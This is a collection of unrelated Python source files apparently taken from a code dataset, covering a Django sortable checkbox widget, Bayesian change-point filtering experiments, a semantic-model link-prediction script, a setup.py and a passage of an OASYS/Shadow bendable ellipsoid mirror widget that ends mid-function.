for i in range(0, nbDepth):
if i == 0:
f.write("\naction An" + str(i+1) + " () {\n")
f.write("\tmotivated;\n")
f.write("\tduration := " + durationA + ";\n")
f.write("};\n")
else:
f.write("\naction An" + str(i+1) + " () {\n")
f.write("\tmotivated;\n")
f.write("\tduration := " + durationA + ";\n")
f.write("\ta : ABC" + str(i) + "();\n")
f.write("\t end(a) < start;\n")
f.write("};\n")
f.write("\naction Bn" + str(i+1) + " () {\n")
f.write("\tduration := " + durationB + ";\n")
f.write("\tmotivated;\n")
f.write("};\n")
f.write("\naction Cn" + str(i+1) + " () {\n")
f.write("\tduration := " + durationC + ";\n")
f.write("\tmotivated;\n")
f.write("};\n")
f.write("\naction ABC" + str(i+1) + " () {\n")
f.write("\t[all] contains {\n")
f.write("\t\t b" + str(i+1) + " : An" + str(i+1) + "();\n")
f.write("\t\t d" + str(i+1) + " : Bn" + str(i+1) + "();\n")
f.write("\t\t e" + str(i+1) + " : Cn" + str(i+1) + "();\n")
f.write("\t};\n")
f.write("\tstart(b" + str(i+1) + ") < start(d" + str(i+1) + ");\n")
f.write("\tend(d" + str(i+1) + ") < end(b" + str(i+1) + ");\n")
f.write("\tstart(d" + str(i+1) + ") < start(e" + str(i+1) + ");\n")
f.write("\tend(e" + str(i+1) + ") < end(d" + str(i+1) + ");\n")
f.write("};\n")
#################### problem #############
f.write("\n/*******Problem************/\n")
f.write("[all] contains{\n")
f.write("\tCn" + str(nbDepth) +"();\n")
f.write("};")
if __name__ == "__main__":
main()
| StarcoderdataPython |
1700791 | <gh_stars>1-10
#!/usr/bin/python
# -*- coding: utf-8 -*-
import ujson
from typing import Dict, Tuple, List, Set, Union, Optional, Any
from pyutils.progress_utils import Timer
from experiments.evaluation_metrics import DataNodeMode
from semantic_labeling import create_semantic_typer
from semantic_modeling.assembling.autolabel.align_graph import align_graph
from semantic_modeling.data_io import get_semantic_models
from semantic_modeling.karma.semantic_model import SemanticModel
from semantic_modeling.link_prediction.int_graph import IntGraph, add_known_models, IntGraphNode, create_psl_int_graph
def oracle_link_prediction(g: IntGraph, sm: SemanticModel):
# step 1: find a mapping between g and sm that yield maximum F1 score
alignment = align_graph(sm.graph, g, DataNodeMode.IGNORE_DATA_NODE)
bijection = alignment['_bijections'][0]
true_links = set()
for attr in sm.attrs:
dnode = sm.graph.get_node_by_id(attr.id)
dlink = dnode.get_first_incoming_link()
if dlink.source_id in bijection.x2prime:
n: IntGraphNode = g.get_node_by_id(bijection.x2prime[dlink.source_id])
if any(st.domain.encode("utf-8") == n.label and st.type.encode('utf-8') == dlink.label for st in
attr.semantic_types):
true_links.add((n.readable_id, dlink.label, attr.label))
for n in sm.graph.iter_nodes():
for e in n.iter_outgoing_links():
if e.get_target_node().is_data_node():
continue
# if e.source_id in bijection.prime2x and e.target_id in bijection.prime2x:
if bijection.x2prime.get(e.source_id, None) is not None and bijection.x2prime.get(e.target_id,
None) is not None:
source = g.get_node_by_id(bijection.x2prime[e.source_id])
ne = next((ne for ne in source.iter_outgoing_links() if ne.target_id == bijection.x2prime[e.target_id]),
None)
if ne is not None and e.label == ne.label:
true_links.add((source.readable_id, e.label, ne.get_target_node().readable_id))
return true_links
if __name__ == '__main__':
timer = Timer().start()
dataset = "museum_edm"
train_size = 14
semantic_models = get_semantic_models(dataset)
semantic_typer = create_semantic_typer(dataset, semantic_models[:train_size])
semantic_typer.semantic_labeling(semantic_models[:train_size], semantic_models[train_size:], 4, True)
int_graph = create_psl_int_graph(semantic_models[:train_size])
print("Preprocessing takes...", timer.lap().report(full_report=True))
results = oracle_link_prediction(int_graph, semantic_models[3])
print(ujson.dumps(results, indent=4))
print("Finish", timer.lap().report(full_report=True))
| StarcoderdataPython |
1637853 | <reponame>frbry/django-sortedone2many
# -*- coding: utf-8 -*-
from itertools import chain
from django import forms
from django.template.loader import render_to_string
from django.utils.encoding import force_text
from django.utils.html import conditional_escape
from django.utils.safestring import mark_safe
from sortedm2m.forms import SortedCheckboxSelectMultiple, SortedMultipleChoiceField
class SortedCheckboxSelectMultipleWithDisabled(SortedCheckboxSelectMultiple):
'''
Render a list of ``choices`` as checkboxes that can be sorted using drag & drop.
Some checkboxes are rendered as "disabled" according to the ``disabled_value``.
'''
# override render()
def render(self, name, value, attrs=None, choices=()):
disabled_value = getattr(self, 'disabled_value', [])
if value is None: value = []
has_id = attrs and 'id' in attrs
final_attrs = self.build_attrs(attrs, name=name)
# Normalize to strings
str_values = [force_text(v) for v in value]
selected = []
unselected = []
for i, (option_value, option_label) in enumerate(chain(self.choices, choices)):
# If an ID attribute was given, add a numeric index as a suffix,
# so that the checkboxes don't all have the same ID attribute.
if has_id:
final_attrs = dict(final_attrs, id='%s_%s' % (attrs['id'], i))
label_for = ' for="%s"' % conditional_escape(final_attrs['id'])
else:
label_for = ''
# if an item has a category other than the current showing category
if option_value in disabled_value and option_value not in value:
extra_attrs = {'disabled': 'disabled'}
else:
extra_attrs = {}
cb = forms.CheckboxInput(final_attrs, check_test=lambda value: value in str_values)
option_value = force_text(option_value)
rendered_cb = cb.render(name, option_value, attrs=extra_attrs)
option_label = conditional_escape(force_text(option_label))
item = {'label_for': label_for, 'rendered_cb': rendered_cb, 'option_label': option_label, 'option_value': option_value}
if option_value in str_values:
selected.append(item)
else:
unselected.append(item)
# re-order `selected` array according str_values which is a set of `option_value`s in the order they should be shown on screen
ordered = []
for value in str_values:
for select in selected:
if value == select['option_value']:
ordered.append(select)
selected = ordered
html = render_to_string(
'sortedm2m/sorted_checkbox_select_multiple_widget.html',
{'selected': selected, 'unselected': unselected})
return mark_safe(html)
class SortedMultipleChoiceWithDisabledField(SortedMultipleChoiceField):
'''
Form field to render a ``SortedOneToManyField`` of a model as a list of
``choices`` or checkboxes that can be sorted using drag & drop.
This form field also adds a special function to the widget:
disables those checkboxes that should not be directly selected
on the current admin view (to ensure the unique ``OneToMany`` relationship).
E.g., on the admin view for ``category 1``,
``item1.category`` is ``category 2``, so the checkbox for ``item1`` is disabled
because ``category 2`` has to remove ``item1`` from its ``items`` list before
``category 1`` can select ``item1`` in the admin view.
Pass a list of ``disabled_value`` to the widget so that the widget can decide
whether to render a checkbox as "disabled".
'''
widget = SortedCheckboxSelectMultipleWithDisabled
def __init__(self, related_query_name, *args, **kwargs):
super(SortedMultipleChoiceWithDisabledField, self).__init__(*args, **kwargs)
# find all items that have an non-null category
disabled_value = self.queryset.filter(**{related_query_name + '__isnull':False}
).values_list('pk', flat=True)
self.widget.disabled_value = disabled_value
| StarcoderdataPython |
3254127 | import os
import sys
import numpy as np
from bocd import BOCD_BayesianLinearRegression
from vbs import print_log, BeamSearchHelper, get_beam_search_helper
from bayes_linear_regression import BayesLinReg
def vbs_filter(x_train_set, y_train_set, x_test_set, y_test_set, config):
dataset = config['dataset']
num_feature = config['num_feature']
sigma_n = config['sigma_n']
beam_size = config['vbs']['K']
beta = config['vbs']['beta'][beam_size]
p = config['vbs']['p'][beam_size]
folder_name = f'./{dataset}_ckpt_vbs_p{p}_beta{beta}_sigma{sigma_n}_b{beam_size}/'
os.mkdir(folder_name)
prior_logodds = np.log(p/(1-p))
sigma_p = np.eye(num_feature)
bsh = get_beam_search_helper(folder_name + '/helper.pkl',
save_folder=folder_name,
beam_size=beam_size,
diffusion=beta,
jump_bias=prior_logodds)
abs_errs = []
abs_1st_errs = []
for task_id, (x_train, y_train, x_test, y_test) in enumerate(
zip(x_train_set,
y_train_set,
x_test_set,
y_test_set)):
if task_id % 2000 == 0:
print('='*75)
print(f"Start task {task_id}.")
if task_id <= bsh.task_id:
print(f"Task {task_id} is already trained. Skip training.")
continue
hypotheses = bsh.get_new_hypotheses_args(x_train, y_train, x_test, y_test)
mu_set, Lambda_set, elbos, test_y_preds = [], [], [], []
num_hypotheses = len(hypotheses)
for hypothesis in hypotheses:
(model_name,
s_t,
diffusion,
mu,
Lambda,
x_train,
y_train,
x_test,
y_test) = hypothesis
if dataset == 'sensordrift':
'''This procedure outputs the correct model evidence:
p(x|s) = int p(x|w) p(w|s) dw
'''
# compile the args
if mu is None:
mu = np.zeros(num_feature)
if Lambda is None:
Lambda = np.eye(num_feature)
# initialization
linreg = BayesLinReg(num_feature=num_feature,
sigma_n=sigma_n,
mu_0=mu,
Lambda=Lambda)
# broaden if required
if s_t == 1:
linreg.broaden_Bayesian_forget(diffusion) # beta = diffusion
# compute predictive probability
marginal_likelihood = linreg.marginal_likelihood(x_train, y_train)
if marginal_likelihood == 0:
# computation stability
raise('marginal_likelihood == 0')
log_marginal_likelihood = -5
else:
log_marginal_likelihood = np.log(marginal_likelihood)
elbos.append(log_marginal_likelihood)
# absorb new evidence
linreg.update(x_train, y_train)
# save weights
mu_set.append(linreg.mu)
Lambda_set.append(linreg.Lambda)
# prediction
test_y_preds.append(linreg.predict_mean(x_test))
else:
'''This implementation "reverses" the `update()` and `elbo`
(marginal evidence) computation, which counts "twice" the
likelihood.
Note this procedure outputs the model evidence with tempered
likelihood:
p(x|s) propto int p(x|w)^2 p(w|s) dw
'''
# compile the args
if mu is None:
mu = np.zeros(num_feature)
if Lambda is None:
Lambda = np.eye(num_feature)
if s_t == 1:
Lambda /= diffusion # beta = 1/diffusion
# predict and absorb new evidence
linreg = BayesLinReg(num_feature=num_feature,
sigma_n=sigma_n,
mu_0=mu,
Lambda=Lambda)
linreg.update(x_train, y_train)
# save weights
mu_set.append(linreg.mu)
Lambda_set.append(linreg.Lambda)
# compute elbo and predict new samples
marginal_likelihood = linreg.marginal_likelihood(x_train, y_train)
if marginal_likelihood == 0:
# computation stability
log_marginal_likelihood = -5
else:
log_marginal_likelihood = np.log(marginal_likelihood)
elbos.append(log_marginal_likelihood)
test_y_preds.append(linreg.predict_mean(x_test))
bsh.absorb_new_evidence_and_prune_beams(elbos, mu_set, Lambda_set)
# ensemble prediction
test_y_pred = bsh.weighted_test_probability(test_y_preds)
if config['logodds']:
test_y_pred = 1 / (1 + np.exp(-test_y_pred))
abs_err = np.abs(test_y_pred - y_test)
abs_errs.append(abs_err)
# most likely prediction
test_y_pred_1st = test_y_preds[bsh._indices[0]]
if config['logodds']:
test_y_pred_1st = 1 / (1 + np.exp(-test_y_pred_1st))
abs_1st_err = np.abs(test_y_pred_1st - y_test)
abs_1st_errs.append(abs_1st_err)
if task_id % 10000 == 0:
print('vbs mean error (ensemble):', np.mean(abs_errs))
print('vbs mean error (most likely):', np.mean(abs_1st_errs))
np.save(folder_name + './abs_errs.npy', abs_errs)
np.save(folder_name + './abs_1st_errs.npy', abs_1st_errs)
print('Results saved to', folder_name)
print('vbs mean error (ensemble):', np.mean(abs_errs))
print('vbs mean error (most likely):', np.mean(abs_1st_errs))
return abs_1st_errs, abs_errs
def bocd_filter(x_train_set, y_train_set, x_test_set, y_test_set, config):
num_feature = config['num_feature']
sigma_n = config['sigma_n']
hazard = config['bocd']['hazard']
res_num = config['bocd']['K']
dataset = config['dataset']
folder_name = f'./{dataset}_ckpt_bocd_hazard{hazard}_sigma{sigma_n}_K{res_num}/'
os.mkdir(folder_name)
bocd_helper = BOCD_BayesianLinearRegression(
num_feature=num_feature,
hazard=hazard,
res_num=res_num)
abs_errs, abs_1st_errs = [], []
for i, (x_train, y_train, x_test, y_test) in enumerate(
zip(x_train_set,
y_train_set,
x_test_set,
y_test_set)):
# add a new run length hypothesis
bocd_helper.add_new_cp_hypo()
# evaluate each run length
for rl in bocd_helper.run_lens:
mu, Lambda = rl.params
linreg = BayesLinReg(num_feature=num_feature,
sigma_n=sigma_n,
mu_0=mu,
Lambda=Lambda)
pred_prob = linreg.marginal_likelihood(x_train, y_train)
rl.pred_prob = pred_prob
# infer posterior distributions and update
linreg.update(x_train, y_train)
rl.params = [linreg.mu, linreg.Lambda]
# prediction
rl.test_pred = linreg.predict_mean(x_test)
# rank and prune
bocd_helper.step()
# evaluation
# ensemble prediction
test_y_pred = np.sum([rl.prob*rl.test_pred
for rl in bocd_helper.run_lens])
if config['logodds']:
test_y_pred = 1 / (1 + np.exp(-test_y_pred))
abs_err = np.abs(test_y_pred - y_test)
abs_errs.append(abs_err)
# most likely prediction
test_y_pred_1st = bocd_helper.run_lens[0].test_pred
if config['logodds']:
test_y_pred_1st = 1 / (1 + np.exp(-test_y_pred_1st))
abs_1st_err = np.abs(test_y_pred_1st - y_test)
abs_1st_errs.append(abs_1st_err)
np.save(folder_name + './abs_errs.npy', abs_errs)
np.save(folder_name + './abs_1st_errs.npy', abs_1st_errs)
print('Results saved to', folder_name)
print('bocd mean error (ensemble):', np.mean(abs_errs))
print('bocd mean error (most likely):', np.mean(abs_1st_errs))
return abs_1st_errs, abs_errs
def bf_filter(x_train_set, y_train_set, x_test_set, y_test_set, config):
beta = config['bf']['beta']
sigma_n = config['sigma_n']
dataset = config['dataset']
folder_name = f'./{dataset}_ckpt_bf_beta{beta}_sigma{sigma_n}/'
os.mkdir(folder_name)
bayes_linreg = BayesLinReg(num_feature=config['num_feature'],
sigma_p=np.eye(config['num_feature']),
sigma_n=sigma_n)
abs_errs = []
for i, (x_train, y_train, x_test, y_test) in enumerate(
zip(x_train_set,
y_train_set,
x_test_set,
y_test_set)):
# update
bayes_linreg.update(x_train, y_train, compute_cov=False)
# predict
if config['logodds']:
y_test_pred = bayes_linreg.logit_predict_map(x_test)
else:
y_test_pred = bayes_linreg.predict_mean(x_test)
# error
abs_errs.append(np.abs(y_test_pred - y_test))
# broaden
bayes_linreg.broaden_Bayesian_forget(beta)
np.save(folder_name + './abs_errs.npy', abs_errs)
print('Results saved to', folder_name)
mean_err = np.mean(abs_errs)
print('bf mean error:', mean_err)
return abs_errs
def vcl_filter(x_train_set, y_train_set, x_test_set, y_test_set, config):
dataset = config['dataset']
sigma_n = config['sigma_n']
folder_name = f'./{dataset}_ckpt_vcl_sigma{sigma_n}/'
os.mkdir(folder_name)
bayes_linreg = BayesLinReg(num_feature=config['num_feature'],
sigma_p=np.eye(config['num_feature']),
sigma_n=sigma_n)
abs_errs = []
for i, (x_train, y_train, x_test, y_test) in enumerate(
zip(x_train_set,
y_train_set,
x_test_set,
y_test_set)):
# update
bayes_linreg.update(x_train, y_train, compute_cov=False)
# predict
if config['logodds']:
y_test_pred = bayes_linreg.logit_predict_map(x_test)
else:
y_test_pred = bayes_linreg.predict_mean(x_test)
# error
abs_errs.append(np.abs(y_test_pred - y_test))
np.save(folder_name + './abs_errs.npy', abs_errs)
print('Results saved to', folder_name)
mean_err = np.mean(abs_errs)
print('vcl mean error:', mean_err)
return abs_errs
def ib_filter(x_train_set, y_train_set, x_test_set, y_test_set, config):
dataset = config['dataset']
sigma_n = config['sigma_n']
folder_name = f'./{dataset}_ckpt_ib_sigma{sigma_n}/'
os.mkdir(folder_name)
abs_errs = []
for i, (x_train, y_train, x_test, y_test) in enumerate(
zip(x_train_set,
y_train_set,
x_test_set,
y_test_set)):
bayes_linreg = BayesLinReg(num_feature=config['num_feature'],
sigma_p=np.eye(config['num_feature']),
sigma_n=sigma_n)
# update
bayes_linreg.update(x_train, y_train, compute_cov=False)
# predict
if config['logodds']:
y_test_pred = bayes_linreg.logit_predict_map(x_test)
else:
y_test_pred = bayes_linreg.predict_mean(x_test)
# error
abs_errs.append(np.abs(y_test_pred - y_test))
np.save(folder_name + './abs_errs.npy', abs_errs)
print('Results saved to', folder_name)
mean_err = np.mean(abs_errs)
print('ib mean error:', mean_err)
return abs_errs | StarcoderdataPython |
1770474 | <gh_stars>0
from distutils.core import setup
requires = [
'websocket_client',
'PyYAML',
]
setup(
name='GeminiDataService',
version='0.1.0',
author='<NAME>',
author_email='<EMAIL>',
packages=['geminidata.service','geminidata'],
scripts=['geminidata-service.py'],
url='',
license='LICENSE',
description='Merge/Massage Gemini Data feeds, as a service',
long_description='Massage gemini websocket feeds while broadcasting to unix socket',
install_requires=requires
)
| StarcoderdataPython |
139140 | import os, sys, numpy
from scipy.interpolate import RectBivariateSpline, interp2d
from scipy.optimize import curve_fit
from matplotlib import cm
from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg
from matplotlib.figure import Figure
try:
from mpl_toolkits.mplot3d import Axes3D # necessario per caricare i plot 3D
except:
pass
from PyQt5.QtWidgets import QApplication
from PyQt5.QtCore import QSettings
from orangewidget import gui
from orangewidget.settings import Setting
from oasys.widgets import gui as oasysgui
from oasys.widgets import congruence
from oasys.util.oasys_util import TriggerIn
from orangecontrib.shadow.util.shadow_objects import ShadowOpticalElement, ShadowBeam, ShadowPreProcessorData
from orangecontrib.shadow.util.shadow_util import ShadowPreProcessor
from orangecontrib.shadow.widgets.gui import ow_ellipsoid_element, ow_optical_element
from Shadow import ShadowTools as ST
TRAPEZIUM = 0
RECTANGLE = 1
SINGLE_MOMENTUM = 0
DOUBLE_MOMENTUM = 1
class BendableEllipsoidMirror(ow_ellipsoid_element.EllipsoidElement):
name = "Bendable Ellipsoid Mirror"
description = "Shadow OE: Bendable Ellipsoid Mirror"
icon = "icons/bendable_ellipsoid_mirror.png"
maintainer = "<NAME>"
maintainer_email = "<EMAIL>"
priority = 6
category = "Optical Elements"
keywords = ["data", "file", "load", "read"]
send_footprint_beam = QSettings().value("output/send-footprint", 0, int) == 1
if send_footprint_beam:
outputs = [{"name":"Beam",
"type":ShadowBeam,
"doc":"Shadow Beam",
"id":"beam"},
{"name":"Footprint",
"type":list,
"doc":"Footprint",
"id":"beam"},
{"name":"Trigger",
"type": TriggerIn,
"doc":"Feedback signal to start a new beam simulation",
"id":"Trigger"},
{"name": "PreProcessor_Data",
"type": ShadowPreProcessorData,
"doc": "PreProcessor Data",
"id": "PreProcessor_Data"}
]
else:
outputs = [{"name":"Beam",
"type":ShadowBeam,
"doc":"Shadow Beam",
"id":"beam"},
{"name":"Trigger",
"type": TriggerIn,
"doc":"Feedback signal to start a new beam simulation",
"id":"Trigger"},
{"name": "PreProcessor_Data",
"type": ShadowPreProcessorData,
"doc": "PreProcessor Data",
"id": "PreProcessor_Data"}
]
show_bender_plots = Setting(0)
bender_bin_x = Setting(100)
bender_bin_y = Setting(500)
E = Setting(131000)
h = Setting(10)
kind_of_bender = Setting(1)
shape = Setting(0)
output_file_name = Setting("mirror_bender.dat")
which_length = Setting(0)
optimized_length = Setting(0.0)
M1 = Setting(0.0)
ratio = Setting(0.5)
e = Setting(0.3)
M1_out = 0.0
ratio_out = 0.0
e_out = 0.0
M1_fixed = Setting(False)
ratio_fixed = Setting(False)
e_fixed = Setting(False)
M1_min = Setting(0.0)
ratio_min = Setting(0.0)
e_min = Setting(0.0)
M1_max = Setting(1000.0)
ratio_max = Setting(10.0)
e_max = Setting(1.0)
def __init__(self):
graphical_Options=ow_optical_element.GraphicalOptions(is_mirror=True)
super().__init__(graphical_Options)
tabs = gui.tabWidget(oasysgui.createTabPage(self.tabs_basic_setting, "Bender"))
tab_bender = oasysgui.createTabPage(tabs, "Bender Setting")
surface_box = oasysgui.widgetBox(tab_bender, "Surface Setting", addSpace=False, orientation="vertical")
oasysgui.lineEdit(surface_box, self, "bender_bin_x", "bins Sagittal", labelWidth=260, valueType=int, orientation="horizontal")
oasysgui.lineEdit(surface_box, self, "bender_bin_y", "bins Transversal", labelWidth=260, valueType=int, orientation="horizontal")
material_box = oasysgui.widgetBox(tab_bender, "Bender Setting", addSpace=False, orientation="vertical")
self.le_E = oasysgui.lineEdit(material_box, self, "E", "Young's Modulus ", labelWidth=260, valueType=float, orientation="horizontal")
self.le_h = oasysgui.lineEdit(material_box, self, "h", "Thickness ", labelWidth=260, valueType=float, orientation="horizontal")
gui.comboBox(material_box, self, "kind_of_bender", label="Kind Of Bender ", items=["Single Momentum", "Double Momentum"],
labelWidth=150, orientation="horizontal", callback=self.set_kind_of_bender)
gui.comboBox(material_box, self, "shape", label="Shape ", items=["Trapezium", "Rectangle"],
labelWidth=150, orientation="horizontal", callback=self.set_shape)
tab_fit = oasysgui.createTabPage(tabs, "Fit Setting")
fit_box = oasysgui.widgetBox(tab_fit, "", addSpace=False, orientation="vertical")
file_box = oasysgui.widgetBox(fit_box, "", addSpace=False, orientation="horizontal", height=25)
self.le_output_file_name = oasysgui.lineEdit(file_box, self, "output_file_name", "Out File Name", labelWidth=100, valueType=str, orientation="horizontal")
gui.button(file_box, self, "...", callback=self.select_output_file, width=20)
length_box = oasysgui.widgetBox(fit_box, "", addSpace=False, orientation="horizontal")
self.cb_optimized_length = gui.comboBox(length_box, self, "which_length", label="Optimized Length ", items=["Total", "Partial"],
labelWidth=150, orientation="horizontal", callback=self.set_which_length)
self.le_optimized_length = oasysgui.lineEdit(length_box, self, "optimized_length", " ", labelWidth=10, valueType=float, orientation="horizontal")
self.set_which_length()
gui.separator(fit_box)
def add_parameter_box(container_box, variable, label):
box = oasysgui.widgetBox(container_box, "", addSpace=False, orientation="horizontal")
oasysgui.lineEdit(box, self, variable, label, labelWidth=50, valueType=float, orientation="horizontal")
gui.label(box, self, " ", labelWidth=58)
box = oasysgui.widgetBox(container_box, "", addSpace=False, orientation="horizontal")
setattr(self, "le_" + variable + "_min", oasysgui.lineEdit(box, self, variable + "_min", "Min",
labelWidth=50, valueType=float, orientation="horizontal"))
setattr(self, "le_" + variable + "_max", oasysgui.lineEdit(box, self, variable + "_max", "Max",
labelWidth=35, valueType=float, orientation="horizontal"))
gui.checkBox(box, self, variable + "_fixed", "Fixed", callback=getattr(self, "set_" + variable))
box = oasysgui.widgetBox(container_box, "", addSpace=False, orientation="horizontal")
le = oasysgui.lineEdit(box, self, variable + "_out", "Fitted", labelWidth=50, valueType=float, orientation="horizontal")
le.setEnabled(False)
le.setStyleSheet("color: blue; background-color: rgb(254, 244, 205); font:bold")
def set_variable_fit(): setattr(self, variable, getattr(self, variable + "_out"))
gui.button(box, self, "<- Use", width=58, callback=set_variable_fit)
getattr(self, "set_" + variable)()
m1_box = oasysgui.widgetBox(fit_box, "", addSpace=False, orientation="vertical")
gui.separator(fit_box, 10)
self.ratio_box = oasysgui.widgetBox(fit_box, "", addSpace=False, orientation="vertical")
gui.separator(fit_box, 10)
self.e_box = oasysgui.widgetBox(fit_box, "", addSpace=False, orientation="vertical")
gui.separator(fit_box, 10)
add_parameter_box(m1_box, "M1", "M1")
add_parameter_box(self.ratio_box, "ratio", "M1/M2")
add_parameter_box(self.e_box, "e", "e")
self.set_kind_of_bender()
self.set_shape()
#######################################################
plot_tab = oasysgui.createTabPage(self.main_tabs, "Bender Plots")
view_box = oasysgui.widgetBox(plot_tab, "Plotting Style", addSpace=False, orientation="vertical", width=350)
self.view_type_combo = gui.comboBox(view_box, self, "show_bender_plots", label="Show Plots", labelWidth=220,
items=["No", "Yes"], sendSelectedValue=False, orientation="horizontal")
bender_tabs = oasysgui.tabWidget(plot_tab)
tabs = [oasysgui.createTabPage(bender_tabs, "Bender vs. Ideal (1D)"),
oasysgui.createTabPage(bender_tabs, "Ideal - Bender (1D)"),
oasysgui.createTabPage(bender_tabs, "Ideal - Bender (3D)"),
oasysgui.createTabPage(bender_tabs, "Figure Error (3D)"),
oasysgui.createTabPage(bender_tabs, "Ideal - Bender + Figure Error (3D)")]
def create_figure_canvas(mode="3D"):
figure = Figure(figsize=(100, 100))
figure.patch.set_facecolor('white')
if mode == "3D": figure.add_subplot(111, projection='3d')
else: figure.add_subplot(111)
figure_canvas = FigureCanvasQTAgg(figure)
figure_canvas.setFixedWidth(self.IMAGE_WIDTH)
figure_canvas.setFixedHeight(self.IMAGE_HEIGHT-10)
return figure_canvas
self.figure_canvas = [create_figure_canvas("1D"), create_figure_canvas("1D"),
create_figure_canvas(), create_figure_canvas(), create_figure_canvas()]
for tab, figure_canvas in zip(tabs, self.figure_canvas): tab.layout().addWidget(figure_canvas)
gui.rubber(self.controlArea)
gui.rubber(self.mainArea)
################################################################
#
# SHADOW MANAGEMENT
#
################################################################
def select_output_file(self):
self.le_output_file_name.setText(oasysgui.selectFileFromDialog(self, self.output_file_name, "Select Output File", file_extension_filter="Data Files (*.dat)"))
def set_kind_of_bender(self):
self.ratio_box.setVisible(self.kind_of_bender==1)
def set_shape(self):
self.e_box.setVisible(self.shape==0)
def set_which_length(self):
self.le_optimized_length.setEnabled(self.which_length==1)
def set_M1(self):
self.le_M1_min.setEnabled(self.M1_fixed==False)
self.le_M1_max.setEnabled(self.M1_fixed==False)
def set_ratio(self):
self.le_ratio_min.setEnabled(self.ratio_fixed==False)
self.le_ratio_max.setEnabled(self.ratio_fixed==False)
def set_e(self):
self.le_e_min.setEnabled(self.e_fixed==False)
self.le_e_max.setEnabled(self.e_fixed==False)
def after_change_workspace_units(self):
super().after_change_workspace_units()
label = self.le_E.parent().layout().itemAt(0).widget()
label.setText(label.text() + " [N/" + self.workspace_units_label + "^2]")
label = self.le_h.parent().layout().itemAt(0).widget()
label.setText(label.text() + " [" + self.workspace_units_label + "]")
label = self.cb_optimized_length.parent().layout().itemAt(0).widget()
label.setText(label.text() + " [" + self.workspace_units_label + "]")
def checkFields(self):
super().checkFields()
if self.is_cylinder != 1: raise ValueError("Bender Ellipse must be a cylinder")
if self.cylinder_orientation != 0: raise ValueError("Cylinder orientation must be 0")
if self.is_infinite == 0: raise ValueError("This OE can't have infinite dimensions")
if self.which_length==1:
congruence.checkStrictlyPositiveNumber(self.optimized_length, "Optimized Length")
congruence.checkLessOrEqualThan(self.optimized_length, self.dim_y_plus+self.dim_y_minus, "Optimized Length", "Total Length")
if self.modified_surface > 0:
if not (self.modified_surface == 1 and self.ms_type_of_defect == 2):
raise ValueError("Only Preprocessor generated error profiles are admitted")
congruence.checkStrictlyPositiveNumber(self.bender_bin_x, "Bins X")
congruence.checkStrictlyPositiveNumber(self.bender_bin_y, "Bins Y")
self.output_file_name_full = congruence.checkFileName(self.output_file_name)
def completeOperations(self, shadow_oe):
shadow_oe_temp = shadow_oe.duplicate()
input_beam_temp = self.input_beam.duplicate(history=False)
self.manage_acceptance_slits(shadow_oe_temp)
ShadowBeam.traceFromOE(input_beam_temp,
shadow_oe_temp,
write_start_file=0,
write_end_file=0,
widget_class_name=type(self).__name__)
x, y, z = self.calculate_ideal_surface(shadow_oe_temp)
bender_parameter, z_bender_correction = self.calculate_bender_correction(y, z, self.kind_of_bender, self.shape)
self.M1_out = round(bender_parameter[0], int(6*self.workspace_units_to_mm))
if self.shape == TRAPEZIUM:
self.e_out = round(bender_parameter[1], 5)
if self.kind_of_bender == DOUBLE_MOMENTUM: self.ratio_out = round(bender_parameter[2], 5)
elif self.shape == RECTANGLE:
if self.kind_of_bender == DOUBLE_MOMENTUM: self.ratio_out = round(bender_parameter[1], 5)
self.plot3D(x, y, z_bender_correction, 2, "Ideal - Bender Surfaces")
if self.modified_surface > 0:
x_e, y_e, z_e = ShadowPreProcessor.read_surface_error_file(self.ms_defect_file_name)
if len(x) == len(x_e) and len(y) == len(y_e) and \
x[0] == x_e[0] and x[-1] == x_e[-1] and \
y[0] == y_e[0] and y[-1] == y_e[-1]:
z_figure_error = z_e
else:
z_figure_error = interp2d(y_e, x_e, z_e, kind='cubic')(y, x)
z_bender_correction += z_figure_error
self.plot3D(x, y, z_figure_error, 3, "Figure Error Surface")
self.plot3D(x, y, z_bender_correction, 4, "Ideal - Bender + Figure Error Surfaces")
ST.write_shadow_surface(z_bender_correction.T, numpy.round(x, 6), numpy.round(y, 6), self.output_file_name_full)
# Add new surface as figure error
shadow_oe._oe.F_RIPPLE = 1
shadow_oe._oe.F_G_S = 2
shadow_oe._oe.FILE_RIP = bytes(self.output_file_name_full, 'utf-8')
# Redo Raytracing with the new file
super().completeOperations(shadow_oe)
self.send("PreProcessor_Data", ShadowPreProcessorData(error_profile_data_file=self.output_file_name,
error_profile_x_dim=self.dim_x_plus+self.dim_x_minus,
error_profile_y_dim=self.dim_y_plus+self.dim_y_minus))
def instantiateShadowOE(self):
return ShadowOpticalElement.create_ellipsoid_mirror()
def calculate_ideal_surface(self, shadow_oe, sign=-1):
x = numpy.linspace(-self.dim_x_minus, self.dim_x_plus, self.bender_bin_x + 1)
y = numpy.linspace(-self.dim_y_minus, self.dim_y_plus, self.bender_bin_y + 1)
c1 = round(shadow_oe._oe.CCC[0], 10)
c2 = round(shadow_oe._oe.CCC[1], 10)
c3 = round(shadow_oe._oe.CCC[2], 10)
c4 = round(shadow_oe._oe.CCC[3], 10)
c5 = round(shadow_oe._oe.CCC[4], 10)
c6 = round(shadow_oe._oe.CCC[5], 10)
c7 = round(shadow_oe._oe.CCC[6], 10)
c8 = round(shadow_oe._oe.CCC[7], 10)
c9 = round(shadow_oe._oe.CCC[8], 10)
c10 = round(shadow_oe._oe.CCC[9], 10)
xx, yy = numpy.meshgrid(x, y)
c = c1*(xx**2) + c2*(yy**2) + c4*xx*yy + c7*xx + c8*yy + c10
b = c5*yy + c6*xx + c9
a = c3
z = (-b + sign*numpy.sqrt(b**2 - 4*a*c))/(2*a)
z[b**2 - 4*a*c < 0] = numpy.nan
return x, y, z.T
def calculate_bender_correction(self, y, z, kind_of_bender, shape):
b0 = self.dim_x_plus + self.dim_x_minus
L = self.dim_y_plus + self.dim_y_minus # add optimization length
# flip the coordinate system to be consistent with Mike's formulas
ideal_profile = z[0, :][::-1] # one row is the profile of the cylinder, enough for the minimizer
ideal_profile += -ideal_profile[0] + ((L/2 + y)*(ideal_profile[0]-ideal_profile[-1]))/L # Rotation
if self.which_length == 0:
y_fit = y
ideal_profile_fit = ideal_profile
else:
cursor = numpy.where(numpy.logical_and(y >= -self.optimized_length/2,
y <= self.optimized_length/2) )
y_fit = y[cursor]
ideal_profile_fit = ideal_profile[cursor]
epsilon_minus = 1 - 1e-8
epsilon_plus = 1 + 1e-8
Eh_3 = self.E * self.h ** 3
initial_guess = None
constraints = None
bender_function = None
if shape == TRAPEZIUM:
def general_bender_function(Y, M1, e, ratio):
M2 = M1 * ratio
